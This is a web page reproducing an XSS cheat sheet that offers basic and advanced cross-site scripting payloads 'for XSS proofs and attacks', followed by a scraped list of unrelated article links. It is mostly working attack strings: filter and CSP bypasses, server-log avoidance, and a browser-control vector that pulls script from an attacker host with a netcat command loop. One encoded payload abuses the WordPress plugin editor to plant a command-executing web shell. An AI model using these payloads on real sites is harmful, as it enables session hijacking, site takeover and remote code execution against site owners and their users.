XSS Cheat Sheet
Basic and advanced exploits for XSS proofs and attacks.
Work in progress, bookmark it.
| Technique | Vector/Payload * | ||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| * In URLs: | & => %26 , # => %23 , + => %2B | ||||||||||||||||||
| HTML Context Tag Injection |
<svg onload=alert(1)> "><svg onload=alert(1)// |
||||||||||||||||||
| HTML Context Inline Injection |
"onmouseover=alert(1)// "autofocus/onfocus=alert(1)// |
||||||||||||||||||
| Javascript Context Code Injection |
'-alert(1)-' '-alert(1)// |
||||||||||||||||||
| Javascript Context Code Injection (escaping the escape) |
\'-alert(1)// |
||||||||||||||||||
| Javascript Context Tag Injection |
</script><svg onload=alert(1)> | ||||||||||||||||||
| PHP_SELF Injection | http://DOMAIN/PAGE.php/"><svg onload=alert(1)> | ||||||||||||||||||
| Without Parenthesis | <svg onload=alert`1`> <svg onload=alert(1)> <svg onload=alert(1)> <svg onload=alert(1)> |
||||||||||||||||||
|
Filter Bypass |
(alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1) |
||||||||||||||||||
|
Body Tag |
<body onload=alert(1)> <body onpageshow=alert(1)> <body onfocus=alert(1)> <body onhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x <body onscroll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body onresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE) |
||||||||||||||||||
|
Miscellaneous Vectors |
<marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src onloadstart=alert(1)> <video onloadstart=alert(1)><source> <input autofocus onblur=alert(1)> <keygen autofocus onfocus=alert(1)> <form onsubmit=alert(1)><input type=submit> <select onchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x onshow=alert(1)>right click me! |
||||||||||||||||||
| <x contenteditable onblur=alert(1)>lose focus! <x onclick=alert(1)>click this! <x oncopy=alert(1)>copy this! <x oncontextmenu=alert(1)>right click this! <x oncut=alert(1)>copy this! <x ondblclick=alert(1)>double click this! <x ondrag=alert(1)>drag this! <x contenteditable onfocus=alert(1)>focus this! <x contenteditable oninput=alert(1)>input here! <x contenteditable onkeydown=alert(1)>press any key! <x contenteditable onkeypress=alert(1)>press any key! <x contenteditable onkeyup=alert(1)>press any key! <x onmousedown=alert(1)>click this! <x onmousemove=alert(1)>hover this! <x onmouseout=alert(1)>hover this! <x onmouseover=alert(1)>hover this! <x onmouseup=alert(1)>click this! <x contenteditable onpaste=alert(1)>paste here! |
|||||||||||||||||||
| Code Reuse Inline Script |
<script>alert(1)// <script>alert(1)<!– |
||||||||||||||||||
| Code Reuse Regular Script |
<script src=//brutelogic.com.br/1.js> <script src=//3334957647/1> |
||||||||||||||||||
|
|||||||||||||||||||
| Generic Source Breaking | <x onxxx=alert(1) 1=' | ||||||||||||||||||
| Browser Control | <svg onload=setInterval(function(){with(document)body. appendChild(createElement('script')).src='//HOST:PORT'},0)> $ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done |
||||||||||||||||||
|
|||||||||||||||||||
| <script>alert(1)</script> <script src=javascript:alert(1)> <iframe src=javascript:alert(1)> <embed src=javascript:alert(1)> <a href=javascript:alert(1)>click <math><brute href=javascript:alert(1)>click <form action=javascript:alert(1)><input type=submit> <isindex action=javascript:alert(1) type=submit value=click> <form><button formaction=javascript:alert(1)>click <form><input formaction=javascript:alert(1) type=submit value=click> <form><input formaction=javascript:alert(1) type=image value=click> <form><input formaction=javascript:alert(1) type=image src=SOURCE> <isindex formaction=javascript:alert(1) type=submit value=click> <object data=javascript:alert(1)> <iframe srcdoc=<svg/onload=alert(1)>> <svg><script xlink:href=data:,alert(1) /> <math><brute xlink:href=javascript:alert(1)>click <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> |
|||||||||||||||||||
|
|||||||||||||||||||
| Generic Self to Regular XSS | <iframe src=LOGOUT_URL onload=forms[0].submit()> </iframe><form method=post action=LOGIN_URL> <input name=USERNAME_PARAMETER_NAME value=USERNAME> <input name=PASSWORD_PARAMETER_NAME value=PASSWORD> |
||||||||||||||||||
| Injection in Filename "><img src=1 onerror=alert(1)>.gif Injection in Metadata Injection with SVG File Injection with GIF File as Source of Script (CSP Bypass) |
|||||||||||||||||||
|
Google Chrome |
<script src="data:,alert(1)// "><script src=data:,alert(1)// <script src="//brutelogic.com.br/1.js# <link rel=import href="data:text/html,<script>alert(1)</script> |
||||||||||||||||||
| PHP File for XHR Remote Call |
<?php header(“Access-Control-Allow-Origin: *”); ?> <img src=1 onerror=alert(1)> |
||||||||||||||||||
| Server Log Avoidance | <svg onload=eval(URL.slice(-8))>#alert(1) <svg onload=eval(location.hash.slice(1)>#alert(1) <svg onload=innerHTML=location.hash>#<script>alert(1)</script> |
||||||||||||||||||
| Shortest PoC | <base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done |
||||||||||||||||||
| <script/src="data:,eval(atob(location.hash.slice(1)))//# #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD Qp4LnNlbmQoJCk= http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD |
|||||||||||||||||||
NOTICE: A special version of this cheat sheet (with private stuff) is available to@brutalsecrets followers here (check pass on timeline).
#hack2learn
XSS Cheat Sheet的更多相关文章
- XSS Cheat Sheet(basics and advanced)
XSS Cheat Sheet BASICS HTML注入 当输入位于HTML标记的属性值内或标记的外部(下一种情况中描述的标记除外)时使用.如果输入在HTML注释中,则在payload前加上&quo ...
- XSS (Cross Site Scripting) Prevention Cheat Sheet(XSS防护检查单)
本文是 XSS防御检查单的翻译版本 https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sh ...
- XSS Filter Evasion Cheat Sheet 中文版
前言 译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值.但是这么著名的一个备忘录却一直没有人把它翻译成中文版.很多人仅仅是简单的把文中的 各种代码复制下来,然后看起来很刁的发在 ...
- 转:PostgreSQL Cheat Sheet
PostgreSQL Cheat Sheet CREATE DATABASE CREATE DATABASE dbName; CREATE TABLE (with auto numbering int ...
- Git Cheat Sheet
Merge Undo git merge with conflicts $ git merge --abort Archive $ git archive --format zip --output ...
- CSS3 Animation Cheat Sheet:实用的 CSS3 动画库
CSS3 Animation Cheat Sheet 是一组预设的动画库,为您的 Web 项目添加各种很炫的动画.所有你需要做的是添加样式表到你的网站,为你想要添加动画效果的元素应用预制的 CSS 类 ...
- IOS Application Security Testing Cheat Sheet
IOS Application Security Testing Cheat Sheet [hide] 1 DRAFT CHEAT SHEET - WORK IN PROGRESS 2 Int ...
- HTML5 Cheat sheet PNG帮助手册(标签、事件、兼容)
HTML5 Cheat sheet PNG帮助手册(标签.事件.兼容) 1.HTML5标签 2.HTML5事件 3.HTML5兼容 最新HTML5手册资料请参考:http://www.inmotion ...
- [转]Swift Cheat Sheet
原文:http://kpbp.github.io/swiftcheatsheet/ A quick cheat sheet and reference guide for Apple's Swift ...
随机推荐
- Consul etcd ZooKeeper euerka 对比
这里就平时经常用到的服务发现的产品进行下特性的对比,首先看下结论: Feature Consul zookeeper etcd euerka 服务健康检查 服务状态,内存,硬盘等 (弱)长连接,kee ...
- Channel 9视频整理【2】
JadeChang https://channel9.msdn.com/Niners/JadeChang 繁体中文视频 2016 Nano Server / Docker / Containers 打 ...
- HDU 2068 RPG错排 [错排公式]
1.题意:1到N的序列的排列中,元素位置与元素值相对应的情况(值为i的元素在某个排列中正好排在第i个位置)大于等于序列规模一半的情况,有多少个? 2.输入输出:每组数据一个数,N,规定输入以0结尾: ...
- ELK学习实验007:Nginx的日志分析系统之Metribeat配置
一 Metricbeat 简介 1.1 系统级监控,更简洁将 Metricbeat 部署到您的所有 Linux.Windows 和 Mac 主机,并将它连接到 Elasticsearch 就大功告成了 ...
- 洛谷$P4001\ [ICPC-Beijing 2006]$狼抓兔子 网络流+对偶图
正解:网络流+对偶图 解题报告: 传送门! $umm$日常看不懂题系列了$kk$.其实就是说,给定一个$n\cdot n$的网格图,求最小割$QwQ$ 然后网格图的话显然是个平面图,又看到数据范围$n ...
- $NIM$游戏小总结
$umm$可能之后会写个博弈论总结然后就直接把这个复制粘贴上去就把这个删了 但因为还没学完所以先随便写个$NIM$游戏总结趴$QAQ$ 首先最基础的$NIM$游戏:有$n$堆石子,每次可以从一堆中取若 ...
- vps远程桌面服务器管理
vps服务器是没有远程桌面系统的,本地电脑要有远程桌面的组件或者专业的远程桌面管理工具,如果出于安全考虑关闭了3389端口(这是系统自带远程桌面的端口),你可以试试iis7远程桌面管理工具,这个还是很 ...
- 还看不懂同事代码?快来补一波 Java 7 语法特性
前言 Java 平台自出现到目前为止,已经 20 多个年头了,这 20 多年间 Java 也一直作为最流行的程序设计语言之一,不断面临着其他新兴编程语言的挑战与冲击.Java 语言是一种静态强类型语言 ...
- .NET Core 3.0 System.Text.Json 和 Newtonsoft.Json 行为不一致问题及解决办法
行为不一致 .NET Core 3.0 新出了个内置的 JSON 库, 全名叫做尼古拉斯 System.Text.Json - 性能更高占用内存更少这都不是事... 对我来说, 很多或大或小的项目能少 ...
- 2019HDU多校第四场题解
1001.AND Minimum Spanning Tree 传送门:HDU6614 题意:给你一个又n个点的完全图,点编号从1~n,每条边的权值为被连接的两点编号按位与后的值.现在要你找到最小生成树 ...